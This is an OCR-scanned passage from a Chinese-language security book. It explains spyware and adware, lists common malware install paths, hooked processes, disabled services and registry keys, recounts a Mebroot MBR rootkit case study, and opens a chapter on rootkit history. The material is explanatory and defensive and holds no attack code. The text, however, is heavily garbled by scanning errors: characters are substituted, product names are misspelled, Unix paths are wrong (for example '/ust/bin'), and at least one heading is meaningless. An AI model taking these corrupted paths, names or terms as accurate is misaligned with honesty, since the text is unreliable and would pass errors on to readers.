套 接 字 文 件 。 删 除 受到 间谍 软件 感染 的 inetadpt.dll 文 件 将 中 断 正常 的 网 络 使 用 。 和 许多 其 他 操作 系统 的 用 户 不 同 ， 为 了 易 用 
性 ， 典 型 的 Windows 用 户 具 有 管理 特权 。 因 为 这 种 特性 ， 用 户 (故意 或 者 无 意 ) 运行 的 任何 程序 也 就 具有 无 限 的 系统 访问 权 。 
间谍 软件 和 其 他 威胁 已 经 导致 一 些 Windows 用 户 迁 移 到 其 他 平台 (如 Linux 或 者 Apple Macintosh) ， 这 些 平台 较 不 容易 受到 恶 
意 软 件 的 感染 。 这 归功 于 这 些 操作 系统 默认 情况 下 不 允许 程序 进行 任何 深入 操作 系统 内 部 的 无 限制 访问 。 和 其 他 操作 系统 一 
样 ，Windows 用 户 可 以 遵循 最 少 权限 原则 并 使 用 非 管理 员 最 少 用 户 访问 账户 ， 或 者 减少 脆弱 的 特殊 面向 Internet 进 程 (如 
Internet Explorer) 的 特权 。 但 是 ， 因 为 这 不 是 默认 或 者 “ 预 设 ”的 配置 ， 很 少 有 用 户 这 么 做 。 


rs 


许多 间谍 软件 利用 弹出 式 广 告 感染 受害 者 。 有 些 程序 仅仅 定时 显示 弹出 广告 ， 例 如， 一 些 弹出 式 广告 每 过 几 分 钟 或 者 在 用 户 
打开 新 的 浏览 器 窗口 时 显示 弹出 广告 ， 有 些 间谍 软件 在 一 定 的 时 间 内 打开 好 几 十 个 广告 。 其 他 一 些 程序 则 在 用 户 访问 特定 网 站 时 
显示 广告 ， 这 和 针对 性 的 广告 很 类 似 。 间 谍 软 件 的 运作 者 根据 广告 商 的 要 求 提供 这 种 功能 ， 广 告 商 可 以 购买 广告 位 置 ， 当 用 户 访 
问 特殊 网 站 时 在 弹出 式 广 告 中 显示 特定 的 消费 品 。 这 也 是 间谍 程序 收集 用 户 行为 习惯 和 浏览 习惯 的 原因 之 一 。 


许多 用 户 抱怨 恼人 或 者 具有 攻击 性 的 广告 。 和 无 数 的 横幅 广告 一 样 ， 许 多 间谍 软件 广告 使 用 动画 或 者 闪烁 的 横幅 ， 这 会 在 视 
觉 上 打扰 并 且 激 她 用 户 ， 很 多 时 候 甚 至 使 网 络 浏览 都 变 得 令 人 难以 忍受 。 弹 出 式 的 色情 广告 的 显示 往往 没有 规律 并 且 出 现在 最 糟 
糕 的 时 候 ( 当 你 的 太太 为 你 送 咖啡 的 时 候 ) 。 到 这 些 网 站 的 链接 可 能 被 加 到 浏览 器 窗口 、 历 史记 录 或 者 搜索 功能 中 ， 这 可 能 被 你 
的 家 庭 成 员 或 者 雇员 看 到 。 许 多 间谍 程序 违反 法 律 ， 比 如 Zlob 和 Trojan-Downloader.Win32.INService 的 变种 因 其 显示 违反 儿 
童 色情 作品 法 的 儿童 色情 网 站 而 臭名 昭著 。 这 一 变种 还 因 违 反 版 权 法 的 弹出 式 序 列 号 生成 器 、 破 解 以 及 非法 软件 弹出 广告 而 闻 
名 。 


对 有 些 间 庶 程 序 来 说 还 有 另 一 个 问题 ， 与 查看 过 的 网 站 上 的 横幅 广告 的 蔡 代 有 关 。 在 某 些 情况 下 ， 一 些 间 谍 程 序 被 专门 创建 
为 浏览 器 助手 对 象 (Browser Helper Objects, BHO) ， 以 便 在 SS 或 者 HTTPs 连 接 期 间 记 录用 户 交 互 ( 击 键 ， 浏 览 的 页 面 
等 ) 。 通 过 这 种 基于 间谍 软件 的 BHO， 犯 罪 分 子 可 以 直接 访问 你 使 用 Internet Explorer 时 所 做 的 任何 事情 。 这 些 BHO 所 记录 的 
内 容 也 可 以 发 送 到 互联 网 上 的 任何 位 置 以 供 选 择 和 分 析 ， 这 将 导致 某 种 形式 的 身份 盗用 以 及 /或 者 对 受害 人 的 诈骗 。 


使 用 BHO API 的 间谍 软件 能 够 用 犯罪 分 子 为 其 他 广告 商 建立 的 广告 代 蔡 网 站 本 身 的 合法 广告 (网 站 的 资金 来 源 ) 的 引用 ， 
这 为 间谍 软件 运作 者 筹集 资金 。 这 种 做 法 不 仅 侵犯 了 利用 广告 筹 款 的 网 站 的 利润 ， 而 且 还 可 能 用 于 引入 一 些 似 乎 清白 的 广告 ， 这 
些 广告 最 终 被 导向 下 载 恶 意 网 站 。 


广告 软件 /间谍 软件 与 Cookie 


反 间 谍 软 件 和 广告 软件 常常 报告 Web 广 告 的 HTTP cookie 一 一 跟踪 浏览 活动 的 小 文本 文件 ， 它 本 身 不 在 间谍 软件 之 中 ， 但 
是 常常 被 间谍 软件 用 来 在 身份 盗用 之 前 获取 关于 受害 人 的 更 多 信息 。 但 是 cookie 并 不 是 天 生 有 害 的 ， 许 多 第 三 方 cookie 的 用 户 
对 象 将 个 人 计算 机 上 的 空间 用 于 其 (第 三 方 ) 商业 用 途 ， 并 且 许 多 反 间 谍 软 件 会 主动 删除 cookie。 不 过 ， 有 恶意 软件 也 能 将 自己 
的 cookie 写 入 主机 硬盘 ， 以 便 跟踪 用 户 浏览 活动 ， 这 些 跟踪 记录 之 后 可 以 用 于 身份 盗用 和 /或 引导 弹出 针对 性 的 广告 。cookie 一 
般 是 无 害 的 并 且 有 助 于 用 户 的 浏览 体验 ， 但 是 当 它 们 被 用 于 支持 犯罪 活动 时 ， 就 从 对 用 户 的 帮助 走向 了 妨害 。cookie 能 够 跟踪 
许多 互联 网 浏览 活动 : 


“ 用 户 查 看 的 广告 ;这 种 方法 可 以 用 于 确定 用 户 不 会 两 次 观看 同一 广告 。 

“ 用 户 访问 的 网 站 ， 这 可 以 识别 用 户 感 兴趣 的 网 站 ， 以 便 更 多 地 了 解 个 人 或 者 组 织 。 

. 输入 网 站 表单 的 用 户 个 人 信息 记录 。 经 过 一 段 时 间 ， 就 能 够 收集 到 足以 建立 受害 人 的 大 规模 档案 的 个 人 信息 ， 用 以 盗用 他 
的 身份 。 
广告 软件 /间谍 软件 实例 

下 面 是 一 些 使 用 cookie 记 录 受 害 人 浏览 习惯 信息 的 间谍 软件 实例 。 广 告 软件 和 间谍 软件 按照 功能 可 以 分 为 下 面 几 类 : 


-AdwareWebsearch 这 类 软件 添加 到 受害 者 的 IE 工 具 栏 中 ， 监 视 受 害 者 所 浏览 的 网 站 ， 并 且 显 示 其 广告 伙伴 公司 的 广 


oF 


-CoolWebSearch 这 种 软件 具有 几 十 个 变种 ， 是 现在 人 们 最 担心 遇见 的 软件 类 型 之 一 。 它 不 仅 将 计算 机 从 受害 人 所 喜爱 
的 网 站 中 进行 重 定向 ， 而 且 最 终 通常 落 到 它 的 一 个 广告 相关 网 站 ， 将 你 的 计算 机 带 到 一 个 零售 、 电 子 、 赌 博 或 者 各 种 随机 的 网 
站 ， 实 现 的 方法 是 改写 受害 者 的 主 DNS 文件 ， 将 DNS 查询 引导 到 更 快 查找 到 这 些 相 关 网 站 的 网 络 上 。 


-Gator 尽管 我 好 几 年 没有 看 到 这 种 工具 了 ，, 但 是 因为 Gator 提 供给 我 们 的 概念 和 教训 ， 它 还 是 值得 一 提 的 。 这 种 广告 程序 
用 于 以 相关 伙伴 的 横幅 代替 某 些 网 页 上 的 广告 。Gatot 后 来 卖 给 了 Clatia 公 司 ， 这 个 公司 将 Gatot 的 原始 模型 改 成 了 几 个 较 小 的 应 用 
程序 。 


‘Zlob 有 段 时 间 这 是 臭名 昭著 的 特洛伊 木马 ， 因 为 它 不 仅 重 定向 你 的 浏览 器 到 多 个 IT 网 站 ， 而 且 在 受害 者 的 计算 机 上 下 
载 并且 悄 悄 地 安装 和 执行 恶意 应 用 程序 。 


2.2 识别 安装 的 恶意 软件 


作为 例子 ， 我 们 来 看 看 恶意 软件 一 般 在 哪些 位 置 安装 和 运行 ， 以 试图 避免 受害 者 的 发 现 。 最 重要 的 是 ， 我 们 将 要 评估 这 些 恶 
意 软 件 选择 藏身 之 所 的 原因 ， 以 及 对 受害 者 计算 机 的 影响 。 但 是 要 记 住 ， 这 只 是 发 现 恶意 病毒 的 常见 位 置 的 实例 ， 每 天 新 的 恶意 
软件 变种 都 会 改进 并 且 常 常 改变 ， 以 便 避 开 检 测 和 删除 。 


2.2.1 ”典型 安装 位 置 

几乎 所 有 恶意 软件 都 将 安装 在 相似 的 目录 中 ， 以 便 在 整个 受害 者 计算 机 上 运行 和 传播 。 下 面 是 恶意 软件 较 常 见 的 安装 目录 。 
Windows 操 作 系 统 

下 面 是 Microsoft Windows (多 种 版 本 ) 上 找到 的 恶意 软件 典型 安装 位 置 : 

- ApplicationData%\Microsoft\ 

- %System%\ [FileName].dll 

- %Program Files%\ Internet Explorer\ [FileName].dll 

- %Program Files%\Movie Maker\ [FileName].dll 

- %All Users Application Data%\ [FileName].dll 

- %Temp%\ [FileName]. dll 

- %System%\ [FileName].tmp 


- %Temp%\ [FileName].tmp 


Unix/Linux 操 作 系 统 


下 面 是 Unix/Linux (多 种 构造 版 本 ) 上 找到 的 恶意 软件 典型 安装 位 置 : 
/bin/login 

- /bin/.login 
- /bin/ps 

- /etc/ 

- /etc/rc.d/ 
/tmp/ 

- /ust/bin/.ps 
- /ust/lib/ 

- /ust/sbin/ 

* /ust/spool/ 


- /ust/scr/ 


2.2.2 ”在 本 地 磁盘 上 安装 


t 


恶意 软件 一 般 试图 安装 在 主机 上 容易 访问 的 每 个 磁盘 上 ， 这 可 能 是 系统 具有 写 入 权限 的 本 地 或 者 映射 的 网 络 共享 磁盘 。 恶 有 
软件 将 安装 在 系统 分 区 上 前 面 列 出 的 路 径 ， 或 者 任何 可 用 的 辅助 分 区 上 令 人 迷惑 的 文件 位 置 上 。 


dl 


2.2.3 (ZENER 
BALA AERENCA, SAR SHES IRAR. 
Windows 或 者 Unix/Linux 操 作 系统 
时 间 戳 是 通用 的 文件 属性 ， 恶 意 软件 在 各 种 操作 系统 上 的 操作 也 相同 ， 所 选择 的 日 期 与 受害 计算 机 上 的 以 下 日 期 相同 : 
- 系统 安装 日 期 
- 系统 文件 日 期 


即时 选择 的 日 期 


几乎 所 有 恶意 软件 都 会 试图 与 系统 和 用 户 进程 挂钩 ， 以 便 在 幕后 进行 操作 ， 避 免 受害 者 很 快 地 发 现 它 的 活动 。 
Windows 操 作 系统 

以 下 是 Microsoft Windows (多 个 版 本 ) 上 找到 的 受 恶意 软件 感染 的 典型 系统 和 用 户 进程 : 

- explorer.exe 

- services.exe 

- svchost.exe 


- iexplorer.exe 


Unix/Linux 操 作 系统 
以 下 是 在 Unix/Linux (多 个 构造 版 本 ) 操作 系统 上 被 修改 的 一 些 常 用 进程 : 
- apached 
- ftpd 
rpc.statd 
lpd 
- syncscan 


- update 


2.2.5 “禁用 服务 


恶意 软件 一 般 会 试图 禁用 某 些 操作 系统 功能 ， 以 便 继续 运行 和 传播 。 
Windows 操 作 系 统 

下 面 是 恶意 软件 在 Microsoft Windows (多 个 版 本 ) 上 试图 禁用 的 典型 功能 : 

.Windows 自 动 更 新 服务 (wuausetv ) 

- 后 台 智能 传输 服务 (BITS) 

- Windows 安 全 中 心服 务 (wscsvc) 

- Windows Defendet 服 务 (WinDefend) 

- Windows 错 误 报 告 服务 (ERSvc) 


- 也 RSvc 错 误 报 告 服务 (WetSvc) 


Unix/Linux 操 作 系统 
下 面 是 Unix/Linux 操 作 系统 (多 个 构造 版 本 ) 上 被 修改 的 常用 服务 : 
- apached 
- ftpd 
- tpc.statd 
. Ipd 


- zssld 


2.2.6 ”修改 Windows 注 册 表 


下 面 是 一 些 恶 意 软件 为 了 运行 和 传播 而 修改 的 最 常用 的 注册 表 项 目 : 
HKEEY_ LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\ 
- HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ 


- HKEY_LOCAL_MACHINE\SOFTWARE\Mictrosoft\WindowsNT\CutrentVersion\ 





- HKEY_CURRENT_USER\SOFTWARE \Microsoft\ Windows \CurrentVersion\ 


2.3 Wwe 


当今 的 恶意 软件 和 间谍 软件 几乎 能 做 任何 事情 一 一 针对 单个 或 者 多 个 主机 ， 甚 至 针对 一 个 企业 中 没有 直接 组 网 的 计算 机 。 
如 果 恶 意 软 件 窃取 了 你 的 身份 信息 并 且 用 于 其 他 目的 ， 将 会 给 公司 和 个 人 带 来 不 同 程度 的 危害 。 你 必须 知道 恶意 软件 的 威胁 以 及 


目标 、 意 图 ， 以 便 更 好 地 对 抗 其 活动 。 对 恶意 软件 所 做 的 工作 及 其 可 能 的 表现 有 更 好 的 理解 ， 你 保护 的 网 络 不 受 感染 的 能 力 就 会 
增强 。 请 将 这 些 信息 作为 今后 经 常 性 学 习 的 出 发 点 ， 以 便 理解 和 对 抗 最 新 的 变种 及 其 方法 、 意 图 和 功能 。 


二 部 分 “Rootkit 


案例 研究 : 不 可 见 的 Rootkit 偷 走 了 你 的 银行 账户 数据 


2008 年 1 月 ， 出 现 了 一 种 新 型 的 Rootkit， 通 过 在 计算 机 上 安装 击 键 记录 程序 ， 并 且 在 用 户 输入 多 家 欧洲 银行 的 用 户 名 和 密码 
时 进行 监控 窃取 财务 数据 。 这 种 新 的 Rootkit 是 目前 所 见 的 最 具 恶 意 性 的 ， 所 有 防 Rootkit 和 防 恶意 工具 (包括 McAfee、Symantec 甚 


至 Kaspetsky) 都 无 法 发 现 它 ， 这 个 Rootkit 下 载 记 录 计 算 机 中 所 有 击 键 的 恶意 软件 。 


2007 年 12 月 12 日 到 2008 年 1 月 7 日 之 间 ，Versign 下 属 的 安全 公司 iDefense 发 现在 欧洲 有 将 近 5000 台 计算 机 受到 感染 。 一 旦 安装 
了 这 个 Rootkit， 它 就 会 嵌入 到 计算 机 的 主 引导 记录 (MBR) 。MBR 是 计算 机 主 硬盘 的 头 512 字 节 。 计 算 机 的 BIOS 通 知 CPU 执 行 这 
512 字 节 中 的 机 器 码 。 这 段 机 器 码 通 常 被 称 为 自 举 管理 程序 (boot manager) ， 一 般 启 动 计算 机 上 的 操作 系统 并 且 引 时 其 访问 系统 


的 第 一 个 可 用 分 区 。 


如 果 操 作 系 统 允许 改写 硬盘 的 头 512 字 节 ， 自 举 管理 程序 就 可 以 被 其 他 代码 蔡 换 。Microsoft Windows 允 许 由 管理 用 户 执 行 的 
应 用 程序 覆盖 MBR。 当 用 户 访问 有 意 传播 病毒 的 网 站 (如 各 种 色情 和 非法 软件 (warez) 网 站 ) 时 ， 就 会 自行 感染 。 这 个 名 为 
Mebroot 的 Rootkit 利 用 运行 有 漏洞 的 Intetnet Exploret 的 用 户 ， 一 旦 利用 成 功 ，Rootkit 下 载 一 个 450KB (相当 大 ) 的 文件 ， 运 行 这 
个 文件 会 将 自身 存储 在 硬盘 的 最 后 几 个 该 区 中 ， 并 且 将 一 个 Rootkit 的 自 举 管 理 程序 副本 写 入 到 MBR 中 ， 执 行 Rootkit 本 身 。 


因为 这 个 Rootkit 写 入 到 MBR， 当 系统 重新 启动 时 ， 这 个 Rootkit 将 先 于 操作 系统 运行 ， 从 而 确保 它 首 先 装 入 ， 可 以 重新 感染 





计算 机 。 


更 糟糕 的 是 ，F-secutre 和 Symantec 的 研究 人 员 已 经 证 明 这 个 Rootkit 在 2007 年 11 月 进行 了 B 测 试 以 确保 其 正常 工作 。 寻 找到 的 
Rootkit 可 执行 文件 的 日 期 和 时 间 玲 表明 ， 在 2007 年 11 月 ， 互 联网 上 的 一 个 特殊 域 开始 散布 Mebroot 的 早期 版 本 。 在 B 版 本 发 布 之 
后 ， 又 掀起 了 两 次 高 潮 ， 每 次 都 有 一 些 令 人 惊异 的 功能 面世 。 


除了 成 为 第 一 种 感染 MBR 的 Rootkit 以 外 ，Mebroot 在 当时 还 是 专业 Rootkit 开 发 的 一 个 顶峰 。 用 于 执行 进程 、 隐 藏 网 络 流量 和 
衔 避 检测 的 方法 都 很 先进 ， 在 本 书写 作 的 时 候 仍 然 能 很 有 效 地 避 开 检测 。Mebroot 在 3 个 主要 的 领域 中 进行 了 革新 : 隐藏 式 的 磁盘 
访问 、 绕 开 防 火 墙 、 后 门 通 信 。 这 些 功能 都 在 Microsoft Windows 内 核 中 实现 ， 也 就 是 操作 系统 通常 为 管理 网 卡 或 者 显示 卡 的 驱动 
程序 保留 的 部 分 。 在 内 核 级 别 上 实现 这 些 功 能 所 需要 的 技巧 非常 高 ， 对 于 一 个 传统 的 Rootkit 开 发 人 员 ， 只 是 从 其 他 制作 者 和 网 站 
上 复制 代码 后 稍 作 修改 而 成 的 Rootkit 更 是 了 不 起 。 





磁盘 访问 


传统 的 Rootkit 通 过 拦截 应 用 程序 执行 的 CreateFile () 等 函数 来 防止 对 硬盘 的 访问 。Mebroot 则 不 同 。 仅 仅 履 盖 内 存 中 的 
DISK.SYS 驱 动 程序 的 某 些 部 分 来 拦截 函数 调用 容易 被 检测 到 ， 而 Mebtoot 履 盖 DISK.SYS 驱 动 程序 中 的 所 有 函数 并 且 安 装 一 个 封装 
驱动 程序 来 调用 DISK.SYS， 确 保 行为 检测 产品 (例如 基于 主机 的 入 侵 防 御 系 统 ) 不 会 阻止 它 感染 DISK.SYS。 


作为 进一步 的 措施 ， 这 个 Rootkit 还 启动 一 个 “看 门 狗 ” 线 程 ， 每 过 几 秒 就 进行 检查 ， 确 保 该 Rootkit 的 隐身 功能 仍然 安装 在 系 


统 上 ， 如 果 该 功能 被 移 除 ， 则 重新 安装 。 


绕 开 防火 墙 


Rootkit 需 要 使 它们 和 协同 工作 的 任何 恶意 软件 悄悄 访问 网 络 ， 以 请 求 网 页 并 与 其 指挥 控制 (C&C) 服务 器 通信 。 当 然 ， 如果 


Rootkit 不 隐藏 其 通信 ， 防 Rootkit 工 具 (如 防火 墙 和 主机 入 侵 防 第 系统 (HIPS) ) 可 能 会 发 现 它 


在 Mebroot 之 前 ， 大 部 分 Rootkit 只 是 创建 和 安装 一 个 与 Windows 内 核 的 网 络 接口 NDIS 中 相似 的 网 卡 驱 动 程序 。Mebroot 不 希望 
被 发 现 ， 所 以 开发 人 员 不 使 用 以 上 的 方法 ， 而 是 编写 一 组 算法 来 查找 Mictosoft 的 NDIS 中 隐藏 的 和 文档 中 未 出 现 的 函数 ， 这 使 
Rootkit 可 以 与 NDIS 通 信 而 不 需要 安装 驱动 程序 。 这 种 方法 虽然 隐藏 性 很 好 ， 但 是 要 求 Rootkit 实 现 自 己 的 TCP/IP 协 议 栈 来 与 互联 
网 上 的 其 他 设备 通信 。 编 写 自 己 的 TCP/IP 协 议 栈 很 困难 ， 这 说 明了 Rootkit 创 作者 为 了 不 被 发 现 ， 在 开发 期 间 所 投入 的 专注 力 。 
后 门 通信 


Mebroot 采 用 了 先进 的 防火 墙 绕 开 技术 来 秘密 地 与 互联 网 上 的 指挥 控制 服务 器 通信 并 处 理 来 自 僵尸 网 络 所 有 者 的 命令 。 研 究 
人 员 已 经 发 现 了 Mebroot 的 重要 功能 ， 但 是 因为 它 的 多 态 能 力 和 “ 通 心 粉 ”编码 技术 ， 研 究 人 员 相 信 ， 该 恶意 软件 的 一 些 特征 仍 
然 是 隐藏 的 ， 尚 未 得 以 发 现 和 分 析 。 


首先 ，Rootkit 连 接 到 一 个 随机 的 指挥 控制 服务 器 ， 使 用 当前 时 间 和 日 期 以 及 多 种 硬 编码 域 建立 一 个 域名 。 一 旦 Rootkit 将 一 个 
DNS 名 称 解析 为 IP 地 址 ， 就 会 发 送 一 个 加 密 的 封包 给 这 个 IP 地 址 以 “ping” 这 个 指挥 控制 服务 器 ， 确 定 它 响应 加 密 通 信 。 这 个 
Rootkit 使 用 基于 SHA-1 的 加 密 算法 ， 这 种 算法 是 业界 标准 ， 但 是 使 用 很 弱 和 容易 解密 的 密 钥 ， 研 究 人 员 能 够 解密 封包 。 为 了 增加 
复杂 度 ， 解 密 的 封包 实际 上 包含 了 使 用 其 他 恶意 软件 中 的 不 同 加 密 方 案 加 密 的 数据 。 


指挥 控制 服务 器 响应 Rootkit 之 后 ， 能 够 通知 Rootkit 执 行 以 下 4 个 命令 之 一 : 

将 一 个 DLL 安装 到 任何 进程 中 或 者 安装 新 版 本 的 Mebroot。 

. 卸载 一 个 用 户 模 式 的 DIL 或 者 Mebroot。 

命令 一 个 可 信 的 进程 根据 文件 名 启动 新 的 进程 。 

> 执行 内 核 模 式 下 的 任何 驱动 程序 。 

印 载 Rootkit 的 功能 进一步 证 明 ， 这 个 Rootkit 是 由 专家 开发 和 测试 的 ， 因 为 卸载 功能 在 调试 和 创建 Rootkit 时 都 有 用 。 
接收 到 命令 时 ，Rootkit 将 使 用 非常 详细 的 指令 (对 于 这 个 案例 来 说 太 详 细 了 ! ) 在 系统 上 执行 每 个 命令 ， 确 保 防 Rootkit 技 术 


不 会 阻止 命令 的 执行 。 例 如 ，Rootkit 使 用 内 建 的 系统 调用 (与 操作 系统 做 的 相似 ! ) 来 重 写 在 系统 上 执行 的 自 定义 DLL。 


图 


cat 


是 什么 样 的 利益 驱使 Mebroot 的 开发 者 愿意 花费 可 能 长 达 数 月 的 时 间 开 发 这 么 高 级 的 Rootkit? 是 金钱 。Mebroot 安 装 和 执行 指 
挥 控 制服 务 器 分 发 的 恶意 软件 来 感染 主机 。 这 个 恶意 软件 能 够 记录 击 键 ， 嗅 探 HITP 和 HTTPS 请 求 ， 并 且 在 网 站 特别 是 银行 网 站 


注入 任意 的 HIML。 这 些 特性 使 其 能 够 进行 许多 不 同类 型 的 欺诈 ， 包 括 身 份 盗窃 、 单 击 欺 诈 和 银行 账户 盗窃 。 


当时 Mebtoot 是 公众 所 见 的 最 高 级 的 Rootkit， 由 专家 编写 ， 高 效 而 且 难 以 移 除 ， 这 个 Rootkit 分 发 恶意 软件 ， 用 于 窃取 像 银 行 
账户 和 信用 卡号 码 这样 的 财务 信息 。Mebtoot 具 备 的 所 有 高 级 功能 只 是 Rootkit 革 新 的 开始 ， 这 一 革新 将 把 曾经 很 容易 清除 或 者 低 
效 的 恶意 软件 能 力 推进 到 一 个 新 的 水 平 。 


现在 ， 并 不 是 说 一 切 都 完了 。Mebroot 可 以 删除 ， 最 简单 的 删除 方法 就 是 从 Windows 恢 复 控制 台 上 运行 fixmbt 命 令 ， 这 可 以 通 
过 Windows XP CD (包含 在 所 有 Windows 安 装 中 ) 启动 。 这 个 命令 用 标准 的 Windows MBR 履 盖 Rootkit 的 MBR 入 口 。 最 新 的 BIOS 的 


某 些 设置 也 能 使 你 的 MBR 成 为 只 读 。 如 果 设 置 为 只 读 ， 任 何 对 MBR 的 修改 都 会 导致 BHIOS 警 告 。 


存在 和 意义 


Mebroot 改 变 了 游戏 规则 ， 开 启 了 Rootkit 的 新 时 代 。 直 到 现在 ，Mebroot 的 新 变种 和 衍生 物 仍 在 继续 发 布 ， 经 过 调整 ， 它 们 能 
够 绕 过 新 开发 的 检测 和 删除 Mebtoot 旧 版 本 的 工具 。 攻 击 者 往往 使 用 这 些 新 版 本 作为 其 他 恶意 软件 的 补充 ， 增 强 他 们 的 Rootkit 能 
力 。 


第 3 章 ”用 户 模 式 Rootkit 


攻击 者 总 是 寻求 各 种 途径 ， 将 那些 为 帮助 用 户 而 设计 的 技术 变 成 武器 ， 为 自己 所 用 。Rootkit 就 是 这 种 技术 之 一 ， 它 被 不 法 
分 子 所 用 的 次 数 如 此 之 多 ， 以 至 于 这 个 词 已 经 变 成 了 恶意 软件 的 同义词 。 但 是 从 严格 的 定义 来 说 ，Rootkit 不 等 于 恶意 软件 ， 这 
种 技术 (或 者 包含 该 功能 的 不 同 套件 使 用 的 技术 ) 之 所 以 深 受 攻击 者 的 欢迎 ， 是 因为 攻击 者 通过 它 得 到 了 通 往 王国 的 钥匙 。 拥 有 
计算 机 系统 的 根 或 者 管理 员 级 权限 ， 他 们 就 可 以 为 所 欲 为 一 特别 是 对 恶意 软件 存活 和 持续 传染 很 重要 的 那些 事情 ， 也 就 是 隐 


Rootkit 及 其 功能 随 着 时 间 的 推移 已 经 改变 。 地 下 组 织 非常 快 地 采用 这 些 应 用 程序 的 功能 ， 这 有 助 于 理解 Rootkit 的 来 源 ， 它 
们 适应 环境 的 原因 ， 以 及 未 来 攻击 者 将 会 利用 它们 来 做 什么 。 


第 一 个 Rootkit 的 前 辈 实际 上 根本 不 是 Rootkit， 只 是 一 组 从 机 器 上 删除 入 侵 证 据 的 应 用 程序 。 早 在 1989 年 就 在 被 黑客 攻击 
的 系统 上 发 现 了 所 谓 的 日 志清 除 工具 套件 ， 该 套件 帮助 攻击 者 在 破坏 一 个 又 一 个 系统 时 掩盖 痕迹 。 这 些 自动 化 的 应 用 程序 将 在 攻 
击 者 得 到 服务 器 管理 权限 后 尽快 执行 ， 找 出 各 种 存储 了 登录 用 户 以 及 用 户 所 执行 命令 的 日 志文 件 。 找 到 这 些 文件 后 ， 打 开 它 们 并 
且 有 策略 地 删除 某 些 日 志 或 者 删除 整个 文件 。 结 果 是 初始 破解 过 程 的 任何 痕迹 都 被 删除 。 


虽然 日 志清 除 程序 帮助 掩盖 了 对 系统 的 第 一 次 访问 ， 但 是 攻击 者 希望 始终 避免 系统 管理 员 发 现 他 们 曾经 登录 过 公司 的 服务 
器 。 这 种 需求 导致 了 第 一 代 Rootkit 的 出 现 。 第 一 代 Rootkit 服 务 于 一 个 主要 的 目的 一 一 执行 使 攻击 者 不 会 被 发 现 的 命令 。 传 统 上 
说 ， 攻 击 由 攻击 者 利用 有 漏洞 的 网 络 服务 (例如 inetd 一 一 Unix 用 来 将 网 络 套 接 字 连 接 到 应 用 程序 的 应 用 ) 、 清 除 日 志和 在 系统 
上 添加 新 用 户 使 攻击 者 能 再 次 访问 系统 组 成 。 这 种 后 门 账户 现在 仍然 是 常见 的 ， 因 为 攻击 者 希望 维护 对 系统 的 访问 权 。 


添加 一 个 新 用 户 的 问题 在 于 可 能 会 被 管理 员 发 现 。 为 了 避免 这 种 情况 ， 第 一 代 Rootkit 包 含 了 日 志清 除 程序 以 及 Unix 常 用 的 
命令 行 工 具 (例如 列 出 文件 目录 的 ls 和 列 出 系统 上 运行 程序 的 ps) 的 新 版 本 。 这 些 新 版 本 从 工具 的 输出 中 删除 了 新 创建 的 后 门 用 
户 的 文件 和 进程 。 


具有 Rootkit 功 能 的 恶意 软件 (现在 简称 为 Rootkit) 是 作为 管理 员工 具 的 技术 被 攻击 者 当成 武器 的 一 个 例子 。 


3.1 Rootkit 


本 书 将 Rootkit 定 义 为 “能 够 长 时 间 存 在 于 计算 机 上 或 者 自动 化 信息 系统 上 的 未 被 发 现 的 程序 和 代码 集合 ”。 和 其 他 软件 


(如 利用 程序 或 者 恶意 软件 ) 不 同 ，Rootkit 一 般 在 系统 重新 启动 后 仍然 持续 起 作用 。 


为 什么 这 个 定义 很 重要 ”这 个 定义 指出 了 Rootkit 和 其 他 类 型 软件 (如 特洛伊 木马 、 病 毒 或 者 应 用 程序 ) 的 关键 差异 。 例 
如 ， 在 定义 中 去 掉 “ 未 被 发 现 ”这 个 词 将 变 成 系统 管理 软件 包 或 者 远程 管理 软件 的 定义 。 但 是 ， 这 个 软件 未 被 发 现 并 且 提 供 和 系 
统 的 固定 联系 暗示 着 该 软件 提供 了 一 个 便于 未 来 访问 的 后 门 。Rootkit 还 有 意 地 通过 安全 界 中 传统 的 和 可 接受 的 方法 编写 来 避免 
被 发 现 。 要 注意 一 点 ， 过 去 的 许多 病毒 和 木马 因为 其 主要 的 功能 而 无 法 隐身 。 


因为 Rootkit 的 设计 目标 是 成 为 无 法 检测 的 软件 ， 所 以 将 会 试图 保持 隐 菩 并 且 掩 盖 其 功能 ， 以 避免 被 防 Rootkit 工 具 发 现 。 大 
部 分 Windows Rootkit 将 会 试图 隐藏 驱动 程序 、 可 执行 文件 (.exe 和 .dl) 和 系统 文件 (.sys) 、 端 口 和 服务 器 连接 、 注 册 表 键 
值 、 服 务 ， 可 能 还 有 其 他 类 型 的 代码 (如 后 门 、 击 键 记录 程序 、 特 洛 伊 木马 和 病毒 ) 。 对 于 获取 系统 的 根 访问 权 并 且 处 于 隐蔽 位 
置 的 软件 包 的 影响 ， 全 世界 的 系统 管理 员 和 网 络 防御 人 员 都 非常 担心 。 许 多 当今 的 Rootkit 的 焦点 已 经 与 恶意 软件 一 致 ， 用 来 隐 
藏 恶意 软件 的 远程 指挥 控制 功能 。 恶 意 软件 需要 远程 访问 被 感染 的 工作 站 ， 而 Rootkit 提 供 隐身 性 使 恶意 软件 的 运行 不 被 发 现 。 


本 书 将 把 未 被 发 现 和 隐藏 这 两 个 词语 互 换 使 用 。 但 是 ， 没 有 一 个 Rootkit 是 永远 无 法 探测 或 者 真正 隐藏 的 。 每 个 Rootkit 都 可 
以 探测 到 ， 但 是 传统 的 应 用 程序 或 者 技术 在 默认 情况 下 可 能 无 法 找到 所 有 的 Rootkit。 而 且 ， 准 确 探测 Rootkit 要 求 的 难度 和 时 间 
可 能 超出 了 结果 的 价值 。 


除了 隐身 以 外 ，Rootkit 一 般 和 提升 非 根 用 户 到 根 级 别 特权 相关 联 。 这 个 功能 多 半 与 Unix Rootkit 而 非 Windows Rootkit 相 
关 ， 因 为 大 部 分 Windows 用 户 以 管理 (tk) 级 别 用 户 的 身份 运行 。 虽 然 Rootkit 最 初 的 目标 (也 是 其 名 字 的 由 来 ) 是 提升 权限 ， 
但 是 现在 对 于 攻击 者 来 阅 ， 保 持 不 被 发 现 和 确保 控制 被 感染 机 器 更 加 有 利 可 图 。 


还 有 一 点 需要 指出 ，Rootkit 一 般 可 以 是 在 磁盘 上 存储 或 者 基于 内 存 的 。 持 续 性 的 Rootkit 将 保留 在 系统 磁盘 上 ， 在 每 次 系统 
局 动 时 装 入 。 这 要 求 代码 被 配置 为 无 人 值守 装 入 和 运行 (这 可 能 导致 Rootkit 被 一 些 更 常用 的 探测 方法 发 现 ) 。 持 续 性 的 Rootkit 
